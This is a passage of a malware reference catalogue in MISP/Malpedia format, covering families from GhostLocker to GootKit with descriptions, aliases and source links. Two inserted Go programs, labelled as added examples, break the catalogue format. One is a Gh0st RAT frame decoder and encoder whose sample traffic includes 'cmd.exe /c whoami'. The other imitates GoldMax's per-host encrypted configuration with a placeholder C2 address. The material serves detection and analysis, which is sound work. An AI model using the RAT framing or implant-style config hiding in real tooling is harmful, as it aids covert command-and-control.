Table 3561. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ghambar

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

GhostLocker

The tag is: misp-galaxy:malpedia="GhostLocker"

GhostLocker is also known as:

Table 3566. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_locker

https://www.uptycs.com/blog/ghostlocker-ransomware-ghostsec

Ghost RAT

According to Security Ninja, Gh0st RAT is a remote access trojan for Windows platforms that has been used to break into some of the most sensitive computer networks on Earth.

Gh0st RAT capabilities include:

  • Take full control of the remote screen on the infected bot.

  • Provide real-time as well as offline keystroke logging.

  • Provide a live feed of the webcam and microphone of the infected host.

  • Download remote binaries onto the infected host.

  • Remotely shut down and reboot the host.

  • Disable the infected computer’s mouse pointer and keyboard input.

  • Enter a shell on the remote infected host with full control.

  • Provide a list of all active processes.

  • Clear all existing hooks from the SSDT.
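The capability list says nothing about what Gh0st traffic looks like on the wire, which is what a network defender needs in order to spot it. The following is an added example, not code from this page or from the Gh0st project: a Go decoder for the classic Gh0st frame layout (a 5-byte marker, originally the string Gh0st; a little-endian uint32 total frame length including the header; a little-endian uint32 length of the body once zlib-inflated; then the zlib-deflated body, whose first byte is the command token). Forks routinely swap the marker string, so it is a parameter rather than a constant. The command tokens and bodies in the sample stream are constructed for the demonstration and carry no real meaning.

```go
package main

import (
	"bytes"
	"compress/zlib"
	"encoding/binary"
	"errors"
	"fmt"
	"io"
)

// Gh0stHeaderLen is the fixed 13-byte frame header: a 5-byte marker, a
// little-endian uint32 total frame length (header included) and a
// little-endian uint32 length of the body once zlib-inflated.
const Gh0stHeaderLen = 13

// DefaultMarker is the marker of the original open-source Gh0st build.
// Forks routinely replace it, so every function takes it as a parameter.
var DefaultMarker = []byte("Gh0st")

var (
	ErrShort    = errors.New("gh0st: buffer shorter than the declared frame")
	ErrNoMarker = errors.New("gh0st: marker mismatch")
	ErrLength   = errors.New("gh0st: inflated length does not match header")
)

// Gh0stFrame is one decoded frame; Payload[0] is the command token.
type Gh0stFrame struct {
	Total    uint32
	Inflated uint32
	Payload  []byte
}

// BuildFrame encodes a frame the way the RAT's sender does: deflate the
// body, then prepend the marker and both lengths. Used here only to
// construct sample traffic offline.
func BuildFrame(marker, body []byte) ([]byte, error) {
	var deflated bytes.Buffer
	w := zlib.NewWriter(&deflated)
	if _, err := w.Write(body); err != nil {
		return nil, err
	}
	if err := w.Close(); err != nil {
		return nil, err
	}
	frame := make([]byte, Gh0stHeaderLen, Gh0stHeaderLen+deflated.Len())
	copy(frame[:5], marker)
	binary.LittleEndian.PutUint32(frame[5:9], uint32(Gh0stHeaderLen+deflated.Len()))
	binary.LittleEndian.PutUint32(frame[9:13], uint32(len(body)))
	return append(frame, deflated.Bytes()...), nil
}

// ParseFrame decodes the frame at the start of buf and returns the bytes
// after it, so a reassembled TCP stream can be walked frame by frame.
func ParseFrame(marker, buf []byte) (*Gh0stFrame, []byte, error) {
	if len(marker) != 5 {
		return nil, buf, errors.New("gh0st: marker must be 5 bytes")
	}
	if len(buf) < Gh0stHeaderLen {
		return nil, buf, ErrShort
	}
	if !bytes.Equal(buf[:5], marker) {
		return nil, buf, ErrNoMarker
	}
	total := binary.LittleEndian.Uint32(buf[5:9])
	inflated := binary.LittleEndian.Uint32(buf[9:13])
	if total < Gh0stHeaderLen || uint64(total) > uint64(len(buf)) {
		return nil, buf, ErrShort
	}
	r, err := zlib.NewReader(bytes.NewReader(buf[Gh0stHeaderLen:total]))
	if err != nil {
		return nil, buf, err
	}
	defer r.Close()
	// Read at most inflated+1 bytes: a hostile header cannot make the
	// decoder inflate unbounded data, and the extra byte exposes a lie.
	body, err := io.ReadAll(io.LimitReader(r, int64(inflated)+1))
	if err != nil {
		return nil, buf, err
	}
	if uint32(len(body)) != inflated {
		return nil, buf, ErrLength
	}
	return &Gh0stFrame{Total: total, Inflated: inflated, Payload: body}, buf[total:], nil
}

// ScanStream walks a captured stream and returns every frame that decodes
// cleanly. On any failure it advances one byte, which is how a detector
// resynchronises after non-Gh0st bytes or a partial capture.
func ScanStream(marker, stream []byte) []*Gh0stFrame {
	var frames []*Gh0stFrame
	for len(stream) >= Gh0stHeaderLen {
		f, rest, err := ParseFrame(marker, stream)
		if err != nil {
			stream = stream[1:]
			continue
		}
		frames = append(frames, f)
		stream = rest
	}
	return frames
}

func main() {
	// Constructed sample stream: leading noise, then two frames whose
	// command tokens and bodies are made up for the demonstration.
	f1, _ := BuildFrame(DefaultMarker, append([]byte{0x65}, "WS-FIN-07|jdoe"...))
	f2, _ := BuildFrame(DefaultMarker, append([]byte{0x01}, "cmd.exe /c whoami"...))
	stream := append([]byte("noise"), f1...)
	stream = append(stream, f2...)
	for _, f := range ScanStream(DefaultMarker, stream) {
		if len(f.Payload) == 0 {
			continue
		}
		fmt.Printf("token=0x%02x total=%d inflated=%d body=%q\n",
			f.Payload[0], f.Total, f.Inflated, f.Payload[1:])
	}
}
```

For a variant with a different marker, pass the observed 5-byte string to ScanStream; the two length fields and the zlib body are usually left untouched by forks, which is why the length cross-check is a more durable signal than the marker itself.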

The tag is: misp-galaxy:malpedia="Ghost RAT"

Ghost RAT is also known as:

  • Farfli

  • Gh0st RAT

  • PCRat

Table 3567. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat

https://www.intezer.com/blog/malware-analysis/chinaz-relations/

https://attack.mitre.org/groups/G0096

https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html

https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf

http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf

https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html

https://hackcon.org/uploads/327/05%20-%20Kwak.pdf

https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits

https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf

https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/

https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf

https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf

https://s.tencent.com/research/report/836.html

https://asec.ahnlab.com/en/32572/

https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://blog.cylance.com/the-ghost-dragon

https://attack.mitre.org/groups/G0001/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/

https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html

https://risky.biz/whatiswinnti/

https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html

https://web.archive.org/web/20170311192337/http://download01.norman.no:80/documents/ThemanyfacesofGh0stRat.pdf

https://www.prevailion.com/the-gh0st-remains-the-same-2/

https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/

https://www.intezer.com/blog-chinaz-relations/

https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

https://www.youtube.com/watch?v=uakw2HMGZ-I

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/

https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/

https://www.secureworks.com/research/threat-profiles/bronze-globe

https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf

http://www.hexblog.com/?p=1248

https://attack.mitre.org/groups/G0011

https://blog.talosintelligence.com/2019/09/panda-evolution.html

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new

https://www.secureworks.com/research/threat-profiles/bronze-union

https://attack.mitre.org/groups/G0026

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/

https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2

https://www.secureworks.com/research/threat-profiles/bronze-edison

http://www.malware-traffic-analysis.net/2018/01/04/index.html

https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html

https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html

https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia

https://www.datanet.co.kr/news/articleView.html?idxno=133346

http://www.nartv.org/mirror/ghostnet.pdf

https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox

Gibberish

Ransomware.

The tag is: misp-galaxy:malpedia="Gibberish"

Gibberish is also known as:

Table 3569. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish

https://id-ransomware.blogspot.com/2020/02/gibberish-ransomware.html

Giffy

The tag is: misp-galaxy:malpedia="Giffy"

Giffy is also known as:

Table 3570. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.giffy

https://vx-underground.org/archive/APTs/2016/2016.09.06/Buckeye.pdf

Glasses

The tag is: misp-galaxy:malpedia="Glasses"

Glasses is also known as:

  • Wordpress Bruteforcer

Table 3574. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses

GlitchPOS

The tag is: misp-galaxy:malpedia="GlitchPOS"

GlitchPOS is also known as:

Table 3576. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos

https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html

GlobeImposter

GlobeImposter is ransomware mainly distributed via "blank slate" spam (messages with no body text and an attached ZIP file), exploits, malicious advertising, fake updates and repacked installers. GlobeImposter mimics the Globe ransomware family. The malware may prevent the execution of anti-virus solutions and other OS security features and may prevent system restoration.

The tag is: misp-galaxy:malpedia="GlobeImposter"

GlobeImposter is also known as:

  • Fake Globe

Table 3577. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter

https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/

https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet

https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf

https://asec.ahnlab.com/en/48940/

https://www.secureworks.com/research/threat-profiles/gold-swathmore

https://www.emsisoft.com/ransomware-decryption-tools/globeimposter

https://isc.sans.edu/diary/23417

https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/

https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/

https://blog.ensilo.com/globeimposter-ransomware-technical

https://asec.ahnlab.com/ko/30284/

https://intel471.com/blog/a-brief-history-of-ta505

Globe

The tag is: misp-galaxy:malpedia="Globe"

Globe is also known as:

Table 3578. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom

Glupteba

Glupteba is trojan malware that ranked among the top ten malware variants of 2021. After infecting a system, Glupteba can be used to deliver additional malware, steal user authentication information and enrol the infected system in a cryptomining botnet.

The tag is: misp-galaxy:malpedia="Glupteba"

Glupteba is also known as:

Table 3580. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

https://habr.com/ru/company/solarsecurity/blog/578900/

https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/

https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf

https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/

https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451

https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728

https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/

https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/

https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html

https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf

https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html

https://blog.google/threat-analysis-group/disrupting-glupteba-operation/

http://resources.infosecinstitute.com/tdss4-part-1/

https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html

https://labs.k7computing.com/?p=22319

https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/

https://community.riskiq.com/article/2a36a7d2/description

https://blog.google/technology/safety-security/new-action-combat-cyber-crime/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/

https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html

https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/

https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/

https://krebsonsecurity.com/2022/06/the-link-between-awm-proxy-the-glupteba-botnet/?utm_source=dlvr.it&utm_medium=twitter

GoBotKR

The tag is: misp-galaxy:malpedia="GoBotKR"

GoBotKR is also known as:

Table 3581. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gobotkr

https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/

goDoH

Proof of concept for data exfiltration via DoH, written in Go.

The tag is: misp-galaxy:malpedia="goDoH"

goDoH is also known as:

Table 3584. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh

https://sensepost.com/blog/2018/waiting-for-godoh/

https://github.com/sensepost/goDoH

Godzilla Loader

The tag is: misp-galaxy:malpedia="Godzilla Loader"

Godzilla Loader is also known as:

Table 3585. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader

https://research.checkpoint.com/godzilla-loader-and-the-long-tail-of-malware/

Gofing

A file infector written in Go, discovered by Karsten Hahn in February 2022. According to Karsten, despite its internal naming, it is not polymorphic and the virus body is not encrypted. Gofing uses the Coldfire Golang malware development library.

The tag is: misp-galaxy:malpedia="Gofing"

Gofing is also known as:

  • Velocity Polymorphic Compression Malware

Table 3586. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gofing

https://twitter.com/struppigel/status/1498229809675214849

GoGoogle

The tag is: misp-galaxy:malpedia="GoGoogle"

GoGoogle is also known as:

  • BossiTossi

Table 3588. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gogoogle

https://labs.bitdefender.com/2020/05/gogoogle-decryption-tool/

GoldenSpy

According to SecurityWeek, the GoldenSpy malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.

One of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK and had recently opened offices in China, became infected after installing “Intelligent Tax”, a piece of software from the Golden Tax Department of Aisino Corporation that a local bank required for paying local taxes.

Although the software worked as advertised, it was found to install a hidden backdoor that gives remote operators the ability to execute Windows commands or upload and run files.

The tag is: misp-galaxy:malpedia="GoldenSpy"

GoldenSpy is also known as:

Table 3592. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/

https://www.ic3.gov/Media/News/2020/201103-1.pdf

https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/

https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/

https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/

https://www.ic3.gov/media/news/2020/200728.pdf

GoldMax

GoldMax is a command-and-control backdoor written in Go and used by the NOBELIUM threat actor group. It uses several techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk; the file name and the AES-256 cipher key are unique per implant and derived from environment variables and information about the network in which it is running.
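The practical consequence of a per-implant key is that the configuration cannot be decrypted from a copy of the file alone: the analyst must reproduce the values the implant read on the victim. The following is an added example, not GoldMax's code and not a reconstruction of its derivation (the page only says the key and file name come from environment variables and network information; which fields and which construction the real implant uses is not stated here). It shows the general technique in Go, with a hypothetical HostProfile of hostname, MAC address and user name as the assumed inputs, AES-256-GCM for the file body, and the derived file name bound in as associated data. The victim and analyst profiles and the configuration blob are constructed sample data.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
)

// HostProfile holds the environment-derived values mixed into the key.
// The field choice is an assumption for this example; the page does not
// say which values the real implant uses.
type HostProfile struct {
	Hostname string
	MAC      string
	User     string
}

// fingerprint serialises the profile deterministically. Length-prefixed
// fields avoid ambiguity between e.g. "ab"+"c" and "a"+"bc".
func fingerprint(p HostProfile) []byte {
	h := sha256.New()
	for _, s := range []string{p.Hostname, p.MAC, p.User} {
		fmt.Fprintf(h, "%d:%s;", len(s), s)
	}
	return h.Sum(nil)
}

// DeriveKey returns the 32-byte AES-256 key for this host, domain-separated
// from the file-name derivation so the two never collide.
func DeriveKey(p HostProfile) []byte {
	h := sha256.Sum256(append([]byte("key|"), fingerprint(p)...))
	return h[:]
}

// DeriveFileName returns the per-host name of the on-disk config file.
func DeriveFileName(p HostProfile) string {
	h := sha256.Sum256(append([]byte("name|"), fingerprint(p)...))
	return hex.EncodeToString(h[:8]) + ".dat"
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// SealConfig encrypts a config blob under the host key. Output layout:
// 12-byte nonce || ciphertext || 16-byte GCM tag. The file name is bound
// in as associated data, so a renamed or relocated file fails to open.
func SealConfig(p HostProfile, config []byte) ([]byte, error) {
	aead, err := newGCM(DeriveKey(p))
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return aead.Seal(nonce, nonce, config, []byte(DeriveFileName(p))), nil
}

// OpenConfig is what an analyst has to reproduce: with a different
// profile the derived key differs and GCM authentication fails.
func OpenConfig(p HostProfile, blob []byte) ([]byte, error) {
	aead, err := newGCM(DeriveKey(p))
	if err != nil {
		return nil, err
	}
	if len(blob) < aead.NonceSize()+aead.Overhead() {
		return nil, errors.New("config blob too short")
	}
	nonce, ct := blob[:aead.NonceSize()], blob[aead.NonceSize():]
	return aead.Open(nil, nonce, ct, []byte(DeriveFileName(p)))
}

func main() {
	// Constructed profiles: the infected host and an analyst's sandbox.
	victim := HostProfile{Hostname: "WS-FIN-07", MAC: "00:0c:29:ab:cd:ef", User: "jdoe"}
	sandbox := HostProfile{Hostname: "ANALYST-VM", MAC: "00:0c:29:00:00:01", User: "lab"}
	config := []byte(`{"c2":"https://c2.example.invalid/","sleep":900}`)

	blob, _ := SealConfig(victim, config)
	fmt.Println("file:", DeriveFileName(victim), "bytes:", len(blob))
	if _, err := OpenConfig(sandbox, blob); err != nil {
		fmt.Println("sandbox cannot open it:", err)
	}
	plain, _ := OpenConfig(victim, blob)
	fmt.Println("victim profile opens it:", string(plain))
}
```

The point for incident responders: when triaging an implant of this kind, capture the environment variables, hostname, adapter details and domain information of the infected host alongside the file, because a detonation on a clean sandbox will derive a different key and the configuration will stay opaque.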

The tag is: misp-galaxy:malpedia="GoldMax"

GoldMax is also known as:

  • SUNSHUTTLE

Table 3593. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/

https://securelist.com/it-threat-evolution-q2-2023/110355/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://securelist.com/extracting-type-information-from-go-binaries/104715/

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

https://www.youtube.com/watch?v=koZkHEJqPrU

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

GoldDragon

GoldDragon was a second-stage backdoor that established a persistent presence on the victim’s system once the first-stage, fileless, PowerShell-based attack leveraging steganography had executed. The initial attack was first observed in December 2017, when a Korean-language spear-phishing campaign targeted organizations linked with the Pyeongchang 2018 Winter Olympics. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.

The malware was capable of basic reconnaissance, data exfiltration and downloading additional components from its C&C server.

The tag is: misp-galaxy:malpedia="GoldDragon"

GoldDragon is also known as:

  • Lovexxx

Table 3594. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon

https://asec.ahnlab.com/en/31089/

https://www.youtube.com/watch?v=rfzmHjZX70s

https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf

GoMet

The tag is: misp-galaxy:malpedia="GoMet"

GoMet is also known as:

Table 3596. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gomet

https://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html

Gomorrah stealer

Gomorrah is a stealer with little or no obfuscation that appeared around March 2020. It is sold for about $150 lifetime for v4 (originally $400 for v3) or $100 per month by its developer, called "th3darkly / lucifer" (who is also the developer of the CosaNostra botnet). The malware’s main functionalities are stealing (passwords, cryptocurrency wallets) and loading of tasks and other payloads.

The tag is: misp-galaxy:malpedia="Gomorrah stealer"

Gomorrah stealer is also known as:

Table 3597. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer

https://twitter.com/vxunderground/status/1469713783308357633

https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April

GoogleDrive RAT

The tag is: misp-galaxy:malpedia="GoogleDrive RAT"

GoogleDrive RAT is also known as:

Table 3599. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat

https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf

GootKit

Gootkit is a banking trojan consisting of an x86 loader and a payload embedding nodejs as well as a set of js scripts. The loader downloads the payload, stores it in the registry and injects it into a copy of the loader process. The loader also contains two encrypted DLLs intended to be injected into each browser process launched, in order to position the payload as a man-in-the-browser and allow it to apply the webinjects received from the command and control server on HTTPx exchanges. This allows Gootkit to intercept HTTPx requests and responses, and to steal their content or modify it according to the webinjects.

The tag is: misp-galaxy:malpedia="GootKit"

GootKit is also known as:

  • Waldek

  • Xswkit

  • talalpek

Table 3601. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit

https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md

http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html

https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html

https://news.drweb.com/show/?i=4338&lng=en

https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/

https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/

https://www.youtube.com/watch?v=242Tn0IL2jE

https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

https://www.certego.net/en/news/malware-tales-gootkit/

http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html

http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/

https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055

https://dannyquist.github.io/gootkit-reversing-ghidra/

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728

https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/

https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan

https://www.youtube.com/watch?v=QgUlPvEE4aw

https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html

https://www.us-cert.gov/ncas/alerts/TA16-336A

https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/

https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/

https://securelist.com/gootkit-the-cautious-trojan/102731/

https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope

https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://twitter.com/MsftSecIntel/status/1366542130731094021

https://twitter.com/jhencinski/status/1464268732096815105

https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/

https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/PUBLIC_Gootloader%20-%20Foreign%20Intelligence%20Service.pdf

https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps

https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

